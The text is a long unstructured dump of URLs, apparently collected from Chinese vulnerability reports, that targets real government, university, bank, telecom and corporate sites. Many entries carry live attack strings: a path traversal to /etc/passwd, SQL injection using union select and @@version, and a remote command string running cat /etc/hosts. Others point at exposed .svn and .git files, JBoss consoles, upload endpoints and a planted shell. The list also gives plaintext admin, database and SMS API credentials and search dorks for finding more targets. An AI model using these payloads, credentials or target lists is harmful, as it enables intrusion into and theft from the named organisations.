http://edu.transn.com/htdocs/?do=../../../../../etc/passwd%00.jpg http://www.gasmzj.com inurl:edu.cn/zpsys/ http://rszp.scuec.edu.cn/zpsys/uploadfile/file/21434__0035u164f12-utgcrb-i5zt623z-1-i8dgpilb-5yr.jsp http://zhaopin.wmu.edu.cn/zpsys/uploadfile/file/11658539__0034si88-e7arp-i3dwpz0c-1-i8bo0201-85k.jsp http://rszp.gdufs.edu.cn/zpsys/uploadfile/file/null__0035m385d2m-nz1rue-i4z7u5a7-1-i8dh44ov-7ri.jsp http://www.mylib.net/admin/admin_data.asp http://release.changba.com/ http://www.my-et.net/news/?blockid=32 http://rmdhr.safe.gov.cn/ http://60.191.106.201/login.asp http://www.wozhua.mobi/ http://www.essfdc.gov.cn/Article.asp?wzxh=1081 http://www.ltxfdc.com/article.asp?wzxh=1229 http://www.dyfdc.net.cn/Article.asp?wzxh=1826 http://www.wjfdc.gov.cn:81/Article.asp?wzxh=849 http://www.songzishixiao.com/article.asp?wzxh=610 http://ess.enshifdc.com/Article.asp?wzxh=867 www.gongchang.com主站入手 http://www.gongchang.com/robots.txt中泄漏了一个后台路径 http://www.gongchang.com/e/engongchang_admin/ http://zjmooc.worldve.com/Portals/courseAction_getWorldHome.action http://www.naveco.com.cn/.svn/entries http://www.naveco.com.cn/en/.svn/entries http://ouka.naveco.com.cn/.svn/entries http://dealer.naveco.com.cn/.svn/entries http://dealer.naveco.com.cn/en/.svn/entries http://chaoyue.naveco.com.cn/.svn/entries http://workflow.cyou-inc.com/wui/theme/ecology7/page/login.jsp?templateId=1 http://www.gdedu.tv/homePage.action http://www.gdedu.tv/ying.jsp http://www.randstatestats.org/forms.php?cat=1%27 http://www.smarter.com.cn/computers-553/prod-73882721 http://222.68.17.101/ soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:xsd="http://www.w3.org/2001/XMLSchema xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/ xmlns:rec="http://receive.blf.jcms soapenv:Header/ soapenv:Body rec:wsGetYsqgk soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/ xsi:type="xsd:string xsi:type="xsd:string xsi:type="xsd:string xsi:type="xsd:string rec:wsGetYsqgk soapenv:Body 
soapenv:Envelope http://www.aliued.cn/ http://help.fenxi.cnzz.com/?p=36 http://beian.ncfdj.gov.cn:8080/buildInfo.aspx?certno=20150100 http://beian.ncfdj.gov.cn:8080/building.aspx?page=2&sql=isvalid=1 http://beian.ncfdj.gov.cn:8080/Webbargain/buildInfo.aspx?certno=20150100 http://beian.ncfdj.gov.cn:8080/pub_buildctrl.aspx?buildcode=14225158471001 http://beian.ncfdj.gov.cn:8080/Webbargain/pub_buildctrl.aspxbuildcode=14225158471001 http://beian.ncfdj.gov.cn:8080/Webbargain/building.aspx?page=2&sql=isvalid=1 http://www.ynszxc.gov.cn这个站可以写入权限,看了下爱占网权2pr6果断的提交乌云大大。希望能通过吧。查了一下旁站发现这个http://www.ynszxc.gov.cn:8888这个有漏洞下面是漏洞证明 http://www.ssap.com.cn:80 www.ssap.com.cn kk3g.net/api/newslist.ashx?c=&typeid=57&typelevel=&typename=热闻&w=&AspxAutoDetectCookieSupport=1 http://gx.kk3g.net/api/newslist.ashx?c=&typeid=57&typelevel=&typename=热闻&w=&AspxAutoDetectCookieSupport=1 http://sc.kk3g.net/api/newslist.ashx?c=&typeid=57&typelevel=&typename=热闻&w=&AspxAutoDetectCookieSupport=1 http://sd.kk3g.net/api/newslist.ashx?c=&typeid=57&typelevel=&typename=热闻&w=&AspxAutoDetectCookieSupport=1 http://ln.kk3g.net/api/newslist.ashx?c=&typeid=57&typelevel=&typename=热闻&w=&AspxAutoDetectCookieSupport=1 http://hai.kk3g.net/api/newslist.ashx?c=&typeid=57&typelevel=&typename=热闻&w=&AspxAutoDetectCookieSupport=1 http://gz.kk3g.net/api/newslist.ashx?c=&typeid=57&typelevel=&typename=热闻&w=&AspxAutoDetectCookieSupport=1 http://fj.kk3g.net/api/newslist.ashx?c=&typeid=57&typelevel=&typename=热闻&w=&AspxAutoDetectCookieSupport=1 http://www.cdb.com.cn/web/Column.asp?ColumnId=18 http://service.ltpop.gov.cn/ http://service.zzxpop.gov.cn/ http://service.zyxpop.gov.cn/ http://service.akpop.gov.cn/ http://service.hsrk.gov.cn/ http://service.ltjsj.gov.cn/ http://service.ltpop.gov.cn/Services/Singleton/cbd1727fbe80c268/0306/610122103203.shtml http://ckx.em.swjtu.edu.cn/news_xiangxi.asp?id=161 http://ckx.em.swjtu.edu.cn/admin/index.asp http://ckx.em.swjtu.edu.cn/news_xiangxi.asp?id=161 http://123.234.41.55/ 
http://sqlmap.org http://sz.jconline.cn:8080/SzrsOutNet/dynamicView.do?fid=A5C42F1BB9D24C7F8FBDBCABC7FAD2B9 http://www.gzlig.com/ http://gbjt.com.cn/ http://szjfh.com/ http://www.hotata.com/ www.uweb.net.cn http://www.baofen.cn/index.php http://www.baofen.cn www.baofen.cn http://zzb.em.swjtu.edu.cn/html/NewsContent.aspx?NewID=264 http://zzb.em.swjtu.edu.cn/ http://zzb.em.swjtu.edu.cn/html/NewsContent.aspx?NewID=264 http://xj.ac.10086.cn/cas2 soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:xsd="http://www.w3.org/2001/XMLSchema xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/ xmlns:web="http://webservice.blf.jcms soapenv:Header/ soapenv:Body web:wsSyncGetInfos soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/ xsi:type="xsd:string xsi:type="xsd:string xsi:type="xsd:string xsi:type="xsd:string xsi:type="xsd:string web:wsSyncGetInfos soapenv:Body soapenv:Envelope http://123.yinsha.com/url.php?id=2005020101155734 inurl:depdetail.jsp?depcode= http://gk.tjjh.gov.cn/depdetail.jsp?depcode=BRA25E http://60.28.129.212/depdetail.jsp?depcode=BEA18A http://221.239.20.83/depdetail.jsp?depcode=BKA32B http://gk.tjnk.gov.cn/depdetail.jsp?depcode=BDA05G http://gk.tjhqqzf.gov.cn/depdetail.jsp?depcode=BFA24E http://www.hszxsm.gov.cn:8080/smes/login.action http://www.hszxsm.gov.cn:8080 http://218.2.208.155/website/outWebsite/njsdyyy/getDetails.action http://www.zhunbai.com/forget/index.html http://m.zhuna.cn http://www.zt173.com/admin/info/info.do?method=listPage&columnid=100105 http://www.zt173.com/admin/info/info.do?method=listPage&columnid=100105 www.sjs.com.cn http://115.238.97.83/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://115.238.97.83/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://115.238.97.83/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://oa.wnq.com.cn/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://60.31.196.2/yyoa/common/selectPersonNew/initData.jsp?trueName=1 
http://qudao.seeyon.com/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://www.gykghn.com:8080/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://life.ccb-life.com.cn/web/baneConfirm.product?orderId=2000&bizNo=0 http://life.ccb-life.com.cn/web/baneConfirm.product?orderId=240500&bizNo=0 http://appdev.coolyun.com/ylra/loginOutLogin.action http://sl.zhuna.cn/ http://202.193.96.149/ http://202.193.96.168/houqin/houqin/index.php http://www.njfy.gov.cn:8080/courtApp/court/TamTrialManageAction_getTamTrialManageList.action?tamTrialManage.topOrder=-1&tamTrialManage.confirm=-1 http://www.njfy.gov.cn:8080/courtApp/court/TamTrialManageAction_getTamTrialManageList.action http://www.hbxlgt.gov.cn/Admin/index.aspx http://117.41.240./49/50/51 http://117.41.240.50:8080/BaiHeTwoPortal/baihe/sendMessage.action inurl:http://oa.yindatech.com:8008/College_new/Login!login.action?username= http://oa.yindatech.com:8008/College_new/Login!login.action?username=15006&password=15006&server=yd http://oa.yindatech.com:2011/OA/Default_new.jsp http://dwoa.yindatech.com:8866/OA/Default_new.jsp http://oa.yindatech.com:2011/OA/Default_new.jsp inurl:/softwarer/ http://211.81.31.43:85/Softwarer//admin/login.asp http://210.31.3.245/softwarer//admin/login.asp http://111.123.226.31:89/softwarer/admin/login.asp http://rjt.czlib.net:8010/SoftWarer/admin/login.asp http://202.121.183.55:8000/softwarer//admin/login.asp http://202.195.60.180/SoftWarer//admin/login.asp http://61.144.43.228:8055/SoftWarer//admin/login.asp http://www.pdswater.com/ http://www.sydang.com/index.php?m=content&c=index&a=searchkf&id=15 http://www.sydang.com/index.php?m=content&c=index&a=searchkf&id=15 http://121.10.6.114/zscqzy/platform/login!login.action http://www.wcb.yn.gov.cn:8112/ http://www.wcb.yn.gov.cn:8112/jmx-console/ http://www.wcb.yn.gov.cn:8112/admin-console http://tb.nxjn.gov.cn:9090/fuel/login.do http://tb.nxjn.gov.cn:9090 http://www.zxysoft.com/ http://61.190.9.90/webkbgl/xsbjkb.asp?bjmc=11%BF%B5%B8%B42 
http://wasai.yy.com/baby/show.html?uid=1034638 http://wasai.yy.com。 www.randstatestats.org/forms.php?cat= http://www.zznyxxxt.gov.cn:6001/FQSSYSWEB/ http://www.zznyxxxt.gov.cn:6001 http://www.guqiu.com/ http://kc.njnu.edu.cn/rw/system/faq/default.aspx?action=update&id=8 http://class.hujiang.com/biz/apply http://f6.c.hjfile.cn/public/upload/201504/8442b5a8-0576-4c7a-9675-e207d85800a2.aspx http://**.**.**/Default.aspx_ http://www.huaxingedu.cn/PJ/Login.aspx user:admin pass:952148 http://218.22.17.229/pj/SchoolLogin.aspx user:admin pass:1234 http://218.22.143.68:8000/pj/SchoolLogin.aspx user:admin pass:135246 http://my.shopex.cn/ index.php/?c=findpwd&a=reset_pwd http://house.dzwww.com//broker.php?action=getbranch&companyid=2%20union%20select%201,2,table_name,4%20from%20information_schema.tables 3.newcar.dzwww.com/index.php?r=SellerPriceBrand/Index&bid=2&pid=8&city=158 http://wooyun.org/bugs/wooyun-2010-074095 http://qc.homeinns.com/QNPlatom/ http://qc.homeinns.com/NewQC/HotelInternalReportDetails.aspx http://oa.homeinns.com/Voucher/Tasks/TaskList.aspx http://qc.homeinns.com http://www.sdbzxz.com/Dynamic/View.aspx?ID=d7cfcd37-6c2b-4edd-b7bf-4f006583f616 http://m.zhuna.cn/wap/index.php/index/ydHotel?hotelid=14360&rid=56605&pid=23045&tm1=2015-04-12&tm2=2015-04-13&iscard=1&stat=&end=&backurl=http://m.zhuna.cn/wap/index.php/index/getHotelInfo/14360/2015-04-12/2015-04-13?type=1 http://www.fuli100.com.cn/AddressAdd.aspx?UserAddressID=1702 http://www.fuli100.com.cn/AddressAdd.aspx?UserAddressID=1701 http://www.ideacms.net http://www.ideacms.net/demo6/plug/user/login.asp Cookie:urole=%2D1 http://bbs.tianya.cn/post-129938-197-1.shtml http://bbs.tianya.cn/list-129938-1.shtml bbs.tianya.cn/post-123979-157-1.shtml http://changba.kuwo.cn/kge/st/SearchSinger?tag=%E6%B0%91%E6%97%8F http://manage.xinyour.com/ 
http://dict-mobile.iciba.com/interface/index.php?client=1&type=1&c=bilingual&m=getrecommendlist×tamp=1428905919&sign=a3c546418e8d8338&size=10&page=1&uid=&uuid=9ca70393ab364558a30ada73cb50982c&count=0&field=1,2,4,11&cid=241 http://www.ilvxing.com/ http://www.essfdc.gov.cn/web/PubInfo/Ranklist.asp?rank=@@version&ord=1 http://www.hsfdc.com/web/PubInfo/Ranklist.asp?rank=@@version&ord=1 http://www.tmfdc.gov.cn/web/PubInfo/Ranklist.asp?rank=@@version&ord=1 http://www.wjfdc.gov.cn:81/web/PubInfo/Ranklist.asp?rank=@@version&ord=1 http://www.ltxfdc.com/web/PubInfo/Ranklist.asp?rank=@@version&ord=1 http://www.szfcsc.com/web/PubInfo/Ranklist.asp?rank=@@version&ord=1 http://www.stategrid.com.cn/ https://mail.stategrid.com.cn/ site:github.com http://61.178.83.56:8081/ http://61.178.83.56:8081/test.txt http://ah2.zhangyue.com/zybook/u/p/user.php?usr=i9 http://ah2.zhangyue.com/zybook/u/p/user.php?usr=i8 http://ah2.zhangyue.com/zybook/u/p/user.php?usr=i6 http://ah2.zhangyue.com/zybook/u/p/user.php?usr=i2 http://zhaopin.eximbank.gov.cn/user/ResumeViewFrm.aspx?id=49345&leibie=100101 site:muc.edu.cn author:daMao http://222.76.124.135/ http://www.1337day.com/exploit/23480 admin-console.war/]$ http://www.jslgroup.com/admin/index.html b2b.hc360.com/supplyself/241167445.html http://www.baidu.com/s?wd=b2b.hc360.com%2Fsupplyself%2F241167445.html view-source:http://b2b.hc360.com/supplyself/241167445.html http://1.93.0.215:7001/drpengcloudportal/cloud_mall/getMonitorData.action http://tiancheng.sinosteel.com/cms_app/Login.aspx http://cxsq.suqian.gov.cn/sqscms/show/protal_noticeContext.do?template=tpxw&pagesize=6&column=402880f830889db1013088cab8f80001 http://www.yirendai.com/ask/questiondetail.action?id=15383 www.cnvd.org.cn的保存密码为例。 http://www.hnhhszx.com/admin/login.html http://221.10.252.208/ aais15.nkfust.edu.tw/resin-admin http://113.108.96.136/jxpg_gsxzgl/page/login.action http://www.sh.118100.cn/member/userLogin/execute.action http://www.ztauto.com/ 
http://www.ztauto.com/index.php?g=Search&a=detail_chexing&FactoryID=118 http://erm-kbs.ruc.edu.cn/ http://erm-kbs.ruc.edu.cn:80/Ext/WxDetail.aspx?type=50&id=d9ef9331-1aae-46fd-85f5-956711b5f083 http://**.**.**/Ali_ht/index/index http://**.**.**/ali_ht/index/index http://jack.douban.com/prompt/100382/ position:absolute;width:100%;height:300%;background-color vertical-align:top http://www.wooyun.org/ http://localhost/test.html http://www.lvtu100.com:8081/UserCenter/ContactMod?id=8125 http://www.lvtu100.com:8081/UserCenter/ContactMod?id=81210 http://www.lvtu100.com:8081/UserCenter/ContactMod?id=810 www.foshanbank.cn http://www.foshanbank.cn/wy.txt www.lvtu100.com:8081 http://www.lvtu100.com:8081 http://shaiwu.smzdm.com/detail_preview/198007 http://lbs.189.cn/kindeditor/php/file_manager_json.php?path=/ http://lbs.189.cn/kindeditor/php/demo.php http://lbs.189.cn/kindeditor/php/upload_json.php?dir=file http://lbs.189.cn/kindeditor/php/upload_json.php?dir=file http://www.qjtj.com/bb_show.php?lm2=6&ssid=358 https://122.96.155.202/ http://xgc.ylsy.edu.cn http://xgc.ylsy.edu.cn/news/html/?840.html http://xgc.ylsy.edu.cn/news/html/index.php?id=840 Sea:/home/sea# http://xgc.ylsy.edu.cn/news/html/index.php?id=840 http://sqlmap.org www.wooyun.org/bugs/wooyun-2015-0106908)一样。 http://mail.qq.com/zh_CN/htmledition/swf/uploader1d35b7.swf http://mail.qq.com/cgi-bin/login?fun=psaread http://set1.mail.qq.com/cgi-bin/mail_list?sid={SID}&page=0 http://set1.mail.qq.com/cgi-bin/laddr_lastlist?sid={SID}&t=addr_datanew&category=hot http://set1.mail.qq.com/cgi-bin/compose_send?sid={SID www.ncu.edu.tw http://jydd.zjedu.org/common/info_list.php?page=2&colsn=007000000 http://zeaie.zjedu.org/common/info_list.php?page=1&colsn=008000000 http://yw.zjedu.org/common/info_list.php?page=2&colsn=002000000 URL:http://jydd.zjedu.org/admin/main.html http://221.226.93.180/江苏邮政微信管理平台 http://118.26.230.56:20000/ http://ios.mama.cn http://59.151.39.146:8000 http://59.151.39.146:8000/invoker/JMXInvokerServlet 
http://www.cs-airport.com/CSWap/AirlineDetailsW.aspx?id=24 http://xian.weidiancai.com/index.jsp http://support.m41s.com http://cs.m41s.com http://data.m41s.com http://rzpt.smesd.gov.cn/corpinfos.jsp?id=9EB1A84C78AF4EEA9A56924632B594BD* http://sqlmap.org http://59.173.9.165:8018/ http://www.yilibabyclub.com/FindPwd.aspx http://cs.focus.cn:80/ http://cs.focus.cn:80/ http://www.thehanshow.com/ https://ticket.wandaperformance.com http://monk.uboxol.com/config/getClientStartTimes?idfa=1&os=a http://zhixin.baidu.com/My/Index?module=onesite#health/comment http://oneapm.udesk.cn这个地址上,我在在这里提交一个单工,然后在提交后的单工下进行回复,回复的时候我又注册了一个小号进行测试,在回复地址上我们进行了抓包 http://27.223.70.96:8080/index.html http://27.223.70.96:8080//member/address_edit.html?addressid=183 http://27.223.70.96:8080//member/address_edit.html?addressid=181 http://www.sqzjg.com/ewebeditor/Admin_Login888.asp admin:admin http://www.sqzjg.com/Zjhg.asp?Bigid=1 http://jifenshangcheng.m.xunlei.com/cgi-bin/integra_info?userId=219509333 http://27.223.70.32:8080/security/loginInit.action http://sys.xunku.org http://192.168.1.200/muxjp.php ffff:0:f101::188 http://vip.luoxin.cn:6666/logout.action http://59.46.163.20:8081 http://www.incoindex.com/incoindex/usermanager/tologin.action http://co-diovan.medlive.cn http://59.41.9.191/toLogin.action rdp://218.240.46.181:3389 http://www.xmgjj.gov.cn/xzzx/zsgjj/201403/t20140331_10088124.htm http://222.76.242.141/HousingFund/personalAccount/personalAccountDetail.html?cust_acct=公积金账号 http://222.76.242.141/HousingFund/personalAccount/personalAccount.html?id_no=个人身份证号 http://**.**.**/_ http://**.**.**/invoker/JMXInvokerServlet_ http://update2.9797168.com/ http://update2.9797168.com/index.php?c=login http://www.sogoke.com http://www.tmfdc.gov.cn:2901/checklogin.asp http://www.essfdc.gov.cn:2301/checklogin.asp http://www.ltxfdc.com:5201/checklogin.asp http://www.szfcsc.com:81/checklogin.asp http://www.xysfdc.com:5601/checklogin.asp http://www.bsfcba.com/checklogin.asp 
http://www.bsfctl.com/checklogin.asp http://www.bsfclly.com/checklogin.asp http://www.bsfcll.com/checklogin.asp http://www.601601.com http://zs.dhu.edu.cn/dhuzs/EMSQuery.aspx http://lsm.szszyy.cn/?fid=index http://yian.szszyy.cn/?fid=notice&id=1 http://www.gamekin.cn/gk2/new.asp?id=2 intitle:Powered http://www.51utx.com/new.asp?id=2 http://www.bdhgl.com/new.asp?id=2 http://www.gamekin.cn/gk2/new.asp?id=2 http://www.zalvyou.com/new.asp?id=2 http://www.czdfgl.com/new.asp?id=2 http://www.66lxs.com/new.asp?id=3 http://www.hncy-ts.com/new.asp?id=2 http://www.ly0855.com/new.asp?id=2 http://www.jymjly.com/new.asp?id=130 http://www.bsszts.com/new.asp?id=2 http://www.tcxzh.com/new.asp?id=2 http://www.yyczl.com/new.asp?id=2 http://6028808.net/new.asp?id=2 http://fjctsnp.com/new.asp?id=2 http://www.czdfgl.com/new.asp?id=97 http://www.0898666.com/new.asp?id=2 http://www.hncy-ts.com/new.asp?id=2 http://www.zl168.cn/new.asp?id=2 http://www.citsxh.com/new.asp?id=2 http://www.gd98.com/new.asp?id=4 video.chaoxing.com/web.config www.ssvideo.cn/Web.config http://cysp.hebfda.gov.cn:7280/spcy/login!logout.do http://localhost/phpok/admin.php?c=tpl&f=edit_save&id=1&folder=%2F&title=book_list.html http://think.lenovo.com.cn/support/minisite/thinkpad/htmls/advancedsearch.aspx?doccatid=1250747291546&search_time=&keyword=&docid=&categoryID=&page=710 http://sykx.cup.edu.cn/sykxcn/ch/author/check_user.aspx?user_name=ok http://xuebao.sxmu.edu.cn/ch/author/check_user.aspx?user_name=ok http://202.207.192.120/ch/author/check_user.aspx?user_name=ok http://qbxb.alljournals.net.cn/ch/author/check_user.aspx?user_name=ok http://journal.geomech.ac.cn/ch/author/check_user.aspx?user_name=1 http://www.zrgold.com/login/toLogin.action http://co-diovan.medlive.cn/?type=1 http://ui.jiayuan.com/bear/ http://www.juzir.com/print.aspx?i=0408800 http://www.juzir.com/print.aspx?i=3330100 http://118.26.188.146/ http://zhtyg.sjtu.edu.cn:8080/uc_server/admin.php 
http://www.yichao.cn/member/OrderDetail.aspx?OrderID=231881 http://应用名.sturgeon.mopaas.com/.git/config http://www.heagri.gov.cn/hbagri/web_zy/nyfz/more.jsp?curPage=2&key=1&lanmu_id=347 http://q.yoger.com.cn/ http://q.yoger.com.cn/actions.php http://cw.syu.edu.cn:8080/kfweb/admin/admin_loginInfo.aspx http://cw.syu.edu.cn:8080/KfWeb/ http://www.powercreator.com.cn/ http://119.60.3.156:8091/Theme/3/OpenCourse.aspx?CourseID=1&ProjectID=0 http://202.202.111.184/Theme/3/OpenCourse.aspx?CourseID=1&ProjectID=0 http://www.mbastudy.cn/Theme/3/OpenCourse.aspx?CourseID=1&ProjectID=0 http://58.54.132.28:8080/Theme/3/OpenCourse.aspx?CourseID=1&ProjectID=0 http://218.92.71.5:1182/Theme/3/OpenCourse.aspx?CourseID=1&ProjectID=0 http://www.shhanyu.com/ADMIN/main.asp http://www.tba.gov.cn/SUZHOUJU/board_show.asp?id=72 http://27.223.70.96:8080/index.html http://202.97.194.220:7017/dqjg/dqjg/common/attachmentFileAction!download.action http://www.lyfzb.gov.cn/admin/default.asp http://120.86.191.171/system/homeset/homeset!displayOtherById.action https://github.com/NJLOVER/jettyMVC/blob/11247feb70b5160b0367f2051ae7874c493ffd72/src/main/resources/mail.config.xml https://www.cmi.chinamobile.com/CPortal/hacked.jsp http://www.airsafe.com.cn/download.action http://bkszs.sus.edu.cn:8004/zsxt/ http://bkszs.sus.edu.cn:8004/zsxt/editor/admin/login.jsp http://www.jzj.cn/ http://116.55.227.74/ http://mba.nuaa.edu.cn/wwwroot.rar http://m.yoger.com.cn http://video.chinaqy.info/WebUtil/system/LiveProg-liveProgram.action http://fzgh.jsut.edu.cn/ http://fzgh.jsut.edu.cn/WebSiteManger/AdminLoginV1.aspx http://60.190.203.25:59999/templates/index/hrlogon.jsp http://ehr.topsearch.com.hk/templates/index/hrlogon.jsp http://221.123.128.41/templates/index/hrlogon.jsp http://hr.bjn3cc.com/templates/index/hrlogon.jsp http://202.205.112.6/templates/index/hrlogon.jsp http://27.112.9.28:8081/templates/index/hrlogon.jsp http://intranet.topsearch.com.hk/templates/index/hrlogon.jsp 
http://218.64.68.150:8888/templates/index/hrlogon.jsp http://hr.airport.gx.cn:8089/templates/index/hrlogon.jsp http://61.133.218.206:8888/templates/index/hrlogon.jsp http://ehr.XXXX.com.cn/templates/index/mainpanel.do?b_query=link&module=-1 http://124.207.117.120/wsxy-zs/us/toLogin.action http://www.chinafoundation.org.cn/ProjectLibrary-New/system/loginIndex.action http://hbs.qhdzjz.org.cn:8080/jdxt_qhd/toLogin.action https://sso.letv.com/user/bindUserPwd http://211.142.89.82:8000/login.aspx http://221.232.128.166:8080/Frame/index.htm http://moxian.com/main http://124.133.3.232:8080/Zhsqxh.aspx?xm=&sfhm= http://www.yonyou.net.cn/fa.asp?id=731 http://jfk.iiyi.com/list/clist/?ctype= http://jfk.iiyi.com/course/get_rec_list http://**.**.**/defaultroot/voiture_manager/Voituregetsource.jspvoitureid=696360&type=chgMotorMan_ http://**.**.**/defaultroot/govezoffice/gov_documentmanager/govdocumentmanager_judge.jspnumId=1 http://**.**.**/defaultroot/InfoViewIframeAction.dohistoryId=1&action=delHistory URL:http://so.iiyi.com/*?jpg/search/do http://so.iiyi.com/http://wenku.baidu.com/search?word=%CE%C4%BC%FE%B0%FC%BA%AC&lm=0&od=0&fr=top_home?jpg/search/do http://so.iiyi.com/bbs/search/do?author=&d=30&fbd=1&kw=1&mp[]=rate&mp[]=attachment&mp[]=digest&mp[]=recommends http://www.fhyx.com/ http://i.cig.com.cn/ http://58.51.197.175:81 http://58.51.197.175:81/invoker/JMXInvokerServlet http://58.19.178.156:81 http://58.19.178.156:81/invoker/JMXInvokerServlet http://58.19.178.156:81/myname/index.jsp site:cdrcb.com http://px.cdrcb.com:8088 https://mail.cdrcb.com/owa/ http://hktckln.hktc.edb.gov.hk/success/index.php?select1=HK15-033 www.96877.net http://user.fangjia.com/fangjiatong2/feedback/index http://signup.sdx.js.cn/SIGNUP/sysset/comm/SysSetAction_exam.action http://upcdn.b0.upaiyun.com/libs/jquery/jquery-2.0.3.min.js http://fast.ele.me:89/verifyLogin.do ftp://36.32.16.41/ http://admin.yihu.com/ http://user.tgbus.com/login.html,发现是有验证码的,而且验证码是滑动的那种,这个绕过就不说了 
http://www.tgbus.com,发现主站是没有验证码的 http://14.204.84.94:8080/ucenter/index.jsp http://www.fhyx.com/ http://www.fhyx.com/account/forget_passwd.html Shell:http://fast.ele.me/nullc.jsp http://hy.hldf.org.cn/common/registerAction!regRedir.action http://114.80.121.174/index.php http://www.hrssgz.gov.cn/vsgzhr/AssumeHtml/JL-00000001.html http://www.txredcross.org http://gj.517na.com/ http://th.517na.com/ http://gq.517na.com/ http://user.517na.com/ http://jd.517na.com/ http://yc.517na.com/ http://sms.517na.com/SMSLogin.aspx http://stat.daoyoudao.com:80/ http://www.jqsoft.net/ http://60.171.157.123:8002/ScriptResource.axd?d=kNuYg8_hYRCca_hpe1xIILHmrMI_KvKCxS41uOsngxQAAAAAAAAAAAAAAAAAAAAA0 http://106.37.172.5:8080/entrance.do jboss-4.2.3.GA/server/default/./deploy/case.war/ http://zxl.91yong.com/uc/login.html http://www.yoger.com.cn/ URL:http://peixun.iiyi.com/goods/compare http://peixun.iiyi.com/goods/list http://www.osghcinemas.com/ http://think.lenovo.com.cn/webdrivercd/four.aspx?sn=428223CR9HFL87里的JS代码进行分析,摸清楚activex这些函数的用法后,可知结合该控件所提供的AppendExtraDriver、DownloadDriver、GetCurrentDriverPath以及OpenItemFilePath函数可以导致远程命令执行。 http://iminte01.chanapp.chanjet.com:9090/login.jsp?url=%2Findex.jsp http://t3online.chanjet.com/yyexam/jsp/sm/ http://parterner.chanjet.com/admin/Default.aspx http://wiki3.rd.chanjet.com/login.action?os_destination=%2Findex.action http://wiki.rd.chanjet.com/login.action;jsessionid=A0E0E5BD391F33B4F90021EC48F7E512?os_destination=%2Findex.action http://prm.chanjet.com/login/login.php http://www.chanpay.com/common/thirdUserLogin.do?action=toThirdCspLoginPage http://cm.chanpay.com:9999/ http://cm.chanpay.com/agentLogin.jsp http://123.126.31.20/ http://123.126.31.20/.svn/entries http://123.126.31.20/app/.svn/entries com.netease.mail/shared_prefs/下的android-lockpattern-xxx.xml中保存着邮箱大师手势密码配置 http://www.zhulang.com/login/index.html这个接口,就是主站的登陆接口,来到之后可以看到没有验证码和任何登陆限制,以为要输入错误几次用户名和密码才会跳出来,但是试了试还是完全没有任何登陆限制 http://oa.cofco-keystone.com/login.aspx 
http://irmail.nd.com.cn/index.php?lang=eng http://cd.aipu.com/m_news.php?id= http://cd.aipu.com/weixiu/?are= http://27.223.70.96:8080/ http://www.mczb.gov.cn/UserSecurityController.do?method=checkSecurity&userId=1 http://www.mczb.gov.cn/UserSecurityController.do?method=checkSecurity&userId=1 https://xyk.cebbank.com/mycard/setting/updAddress.htm?id=xxx www.umeng.com/api/feedback_request_proxy/?appkey=4fe11bd85270156dd8000014&path=10.18.10.92 http://**.**.**/ctc/servlet/ConfigServletparam=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cat%20/etc/hosts http://223.100.112.165 http://wooyun.org/bugs/wooyun-2010-093779 http://i.maxthon.cn/data/showlist.html https://github.com/chenyurenscau/XmlDemo/blob/4e87a95c0bb89275fda995b2f56f730d72c3eaa1/pay-service-admin/src/main/resources/pay-admin/spring-mail-service.xml http://wooyun.org/bugs/wooyun-2015-098908 http://wooyun.org/bugs/wooyun-2015-090308 jdbc:mysql://10.32.3.48:3306/acedb?characterEncoding=utf8 jdbc:mysql://127.0.0.1:3306/aceapp jdbc:mysql://127.0.0.1:3306/ace?characterEncoding=gbk&noAccessToProcedureBodies=true http://www.appstar.com.cn/bbs/uc_server http://sdxjnyjc.sph.com.cn/存在iis7解析漏洞 http://sdxjnyjc.sph.com.cn/ckfinder/ckfinder.html处任意上传图片 http://sdxjnyjc.sph.com.cn/Upload/files/1%281%29.jpg/.php可任意执行php文件 user:root password:jiaketao password:sql.sph http://lib.qfnu.edu.cn:808/idl/admin/index.htm http://www.gzegn.gov.cn:8080/application/gzhd/bgxz/showdepartments.jsp?zzjgdm=009390359&depName=%CA%A1%C3%F1%D5%FE%CC%FC http://vanbao.wlwservice.com/system/goSyslogin.action http://www.17u.net/ http://marketing.touzhu.cn/main.aspx登陆处存在sql注入漏洞。sa权限。mssql2008。跨裤很多。 http://zaocan.meituan.com/shared/apply?mobile=手机号&sharedId=分享id&type=1 http://robot.lenovo.com.cn/lenovo/think.jsp?channel=think http://cjctb.ccc.gov.cn:8080/Login/Login.aspx http://120.195.108.123:8080/ucenter/ http://61.182.231.214:8080/ http://61.182.231.214:8080/invoker/JMXInvokerServlet http://www.tbmmis.com/Main.aspx 
https://github.com/ytlviv/goweb/blob/6786abdc8530854c717d5f688666f427ae614a00/oa/.svn/pristine/a8/a86b7c3bbf16b2ac4f799e963ebea26fee57b6f1.svn-base http://cop.chanjet.com https://github.com/koudailicai/koudai/blob/bc9dceb7431eae560e94167a48bbc8e5e891e903/common/config/main.php https://github.com/koudailicai/koudai/blob/bc9dceb7431eae560e94167a48bbc8e5e891e903/environments/pre_release/common/config/main-local.php https://github.com/koudailicai/koudai/blob/master/.svn/entries http://oa.chanjet.com/AD/ResetPassword.aspx http://111.205.116.157:8080/MRDMS/system/unitAction!unitTree.action http://ftdy.cntest.com/system/userQuestionsAction!intGetPWDByUserQuestions.action http://web.mobset.com/SDK/Sms_Send.asp?CorpID=116497&LoginName=deyu&passwd=768717 jdbc:oracle:thin:@192.168.6.47:1521:ora92 http://**.**.**/uc_server/ http://114.104.156.250/Bidu_Books_Detail.aspx?id=513567 http://122.224.130.18:86/Bidu_Books_Detail.aspx?id=321327 http://www.zixilib.com:8008/Bidu_Books_Detail.aspx?id=362732 http://220.180.89.90:8081/Bidu_Books_Detail.aspx?id=321327 http://221.1.218.166:81/Bidu_Books_Detail.aspx?id=321327 http://222.68.193.118/ http://222.68.193.118/jmx-console https://counter.yongjinbao.com.cn 